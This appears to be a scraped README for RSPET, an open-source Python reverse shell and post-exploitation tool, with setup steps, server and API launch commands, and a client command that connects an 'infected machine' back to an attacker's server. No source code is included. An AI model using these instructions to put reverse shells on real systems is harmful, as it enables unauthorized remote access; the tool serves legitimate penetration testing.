RSPET (Reverse Shell and Post Exploitation Tool) is a Python based reverse shell equipped with functionalities that assist in a post exploitation scenario.
RSPET (Reverse Shell and Post Exploitation Tool) is a Python based reverse shell equipped with functionalities that assist in a post exploitation scenario.
DISCLAIMER: This software is provided for educational and PenTesting purposes and as a proof of concept. The developer(s) do not endorse, incite or in any other way support unauthorised computer access and networks disruption.
NOTE: min
folder has been removed. The added overhead of maintaining two versions lead to min
not receiving bug-fixes and important updates. If there is interest, both in using and maintaining, a more bare-bone and simplistic version, a new branch will be created to host it.
Current Version: v0.3.1
Follow: @TheRSPET on Twitter for updates.
Documentation : rspet.readthedocs.io
*[1]The idea for XORing as well as the skeleton for the client came from primalsecurity.net so if you like this pack of scripts you'll probably love what they do
*[2]UDP Spoofing uses RAW_SOCKETS so in order to utilize it, the client has to run on an OS that supports RAW_SOCKETS (most Unix-Based) and with root privileges. Finally, most of the ISPs have implementations in place that will either drop or re-structure spoofed packets
*[3]Again check primalsecurity.net's perfect blogpost about producing an .exe
*[4]Detailed documentation on creating Plug-ins available in Online Documentation!
rspet_server.py
is situated at the attacker's machine and running to accept connectionsrspet_client.py
is situated in the infected machine(s) and will initiate the connection and wait for input.Executing ./setup.py
while on the project's root folder will generate the required certificates and install all needed components through pip.
Of course you can manually install the pip packages required by executing pip2 install Flask flask-cors
.
Also you can generate your own key-cert set (just name them server.key
& server.crt
and place them inside the Server folder).
python rspet_server.py [-c #clients, --ip ipToBind, -p portToBind]
max_connections defaults to 5 if left blank
RESTful API:
python rspet_server_api.py [-c #clients, --ip ipToBind, -p portToBind]
Client:
python rspet_client.py <server_ip> [server_port]
Many changes can be made to fit individual needs.
As always if you have any suggestion, bug report or complain feel free to contact me.
A list of Distros that contain RSPET
List_Hosts
This project is following Google's Python Styleguide with a minor variation on the use of whitespaces to align ":" tokens.
This project is open for contributors. If you have implemented a new feature, or maybe an improvement to the current code feel free to open a pull request. If you want to suggest a new feature open an issue. Additionally Testers are needed to run a few standard scenarios (and a few of their own maybe) to decrease the chance a bug slips into a new version. Should there be any interest about testing a beta
branch will be created (where code to be tested will be uploaded) along with a list of scenarios. For a full guide on contribution opportunities and guides check out the "Contributing" chapter on RSPET's Online Documentation
dzervas -- Code (Server OO-redesign, Server Plug-in system implementation, bug reports, bug fixes)
MIT
i.
.7.
.. :v
c: .x
i.::
:
..i..
#MMMMM
QM AM
9M zM
6M AM
2M 2MX#MM@1.
0M tMMMMMMMMMM;
.X#MMMM ;MMMMMMMMMMMMv
cEMMMMMMMMMU7@MMMMMMMMMMMMM@
.n@MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMM@@#$BWWB#@@#$WWWQQQWWWWB#@MM.
MM ;M.
$M EM
WMO$@@@@@@@@@@@@@@@@@@@@@@@@@@@@#OMM
#M cM
QM tM
MM CMO
.MMMM oMMMt
1MO 6MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM iMM
.M1 BM VM ,Mt
1M @M .............................. WM M6
MM .A8OQWWWWWWWWWWWWWWWWWWWWWWWWWWW0Az2 #M
MM MM.
@MMY vMME
UMMMbi i8MMMt
C@MMMMMbt;;i.......i;XQMMMMMMt
;ZMMMMMMMMMMMMMMM@A;.
The Cake is a Lie. But it has been a Year :)